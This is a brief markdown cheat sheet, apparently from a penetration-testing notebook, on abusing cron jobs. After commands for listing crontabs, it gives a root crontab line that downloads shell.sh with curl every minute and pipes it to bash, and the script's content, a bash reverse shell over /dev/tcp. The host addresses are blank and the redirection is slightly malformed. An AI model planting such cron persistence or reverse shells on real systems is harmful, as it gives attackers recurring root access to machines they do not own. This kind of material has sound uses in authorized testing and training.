# Cronjobs * `crontab -l` * `cat /etc/crontab` ## Add Cronjob * Add line ```sh * * * * * root curl http://:8000/shell.sh | bash ``` * Shell content ```sh bash -c "bash -i >& /dev/tcp// 0&1" ```